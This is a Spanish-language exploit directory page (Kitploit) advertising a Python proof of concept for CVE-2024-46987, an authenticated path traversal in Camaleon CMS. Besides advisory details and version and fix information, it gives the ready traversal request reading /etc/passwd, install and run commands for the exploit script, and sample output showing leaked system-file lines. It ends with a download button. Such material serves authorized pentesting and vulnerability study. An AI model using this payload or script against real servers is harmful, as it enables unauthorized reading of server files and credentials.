Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46987 — Exploit creado usando Python | Kitploit
Herramientas/GitHubGitHub/advaitpathak21/cve-2024-46987
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Exploit creado usando Python

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-46987 – Camaleon CMS Path Traversal Autenticado / Lectura Arbitraria de Archivos

CVSS 7.7 High Python PoC

CVE-2024-46987 es una vulnerabilidad de path traversal autenticado (CWE-22) en Camaleon CMS (un sistema de gestión de contenidos basado en Ruby on Rails). Permite a un usuario autenticado (incluso con privilegios bajos) leer archivos arbitrarios en el servidor a través de la acción MediaController#download_private_file.

  • Publicado: 18 de septiembre de 2024
  • CVSS v3.1: 7.7 Alto
    Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (Limitación Inadecuada de un Nombre de Ruta a un Directorio Restringido), CWE-200 (Exposición de Información Sensible)
  • Versiones afectadas: Camaleon CMS ≤ 2.8.0 (algunos informes señalan que también funciona en 2.9.0)
  • Corregido en: ≥ 2.8.2 (recomendado: actualizar a la última versión 2.8.x o 2.9.x)
  • Avisos:
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

Resumen de la Vulnerabilidad

Un atacante con credenciales válidas puede enviar una solicitud manipulada a: /admin/media/download_private_file?file=../../../../etc/passwd

Instalación de Requisitos

  • pip install -r requirements.txt

O

  • pip install -r requests fire

Uso

  • Primero, cree un nuevo usuario
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • Ejemplo de salida:
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

Nota: El script asume un formulario de inicio de sesión estilo Rails (user[email], user[password], authenticity_token). Ajuste los campos del payload si su objetivo utiliza nombres personalizados.

Advertencia Legal y Ética

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

Úsela solo en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas (por ejemplo, programas de bug bounty, pentests internos, laboratorios como HTB). El uso no autorizado puede violar leyes. El autor no se hace responsable del mal uso.

Descargar herramienta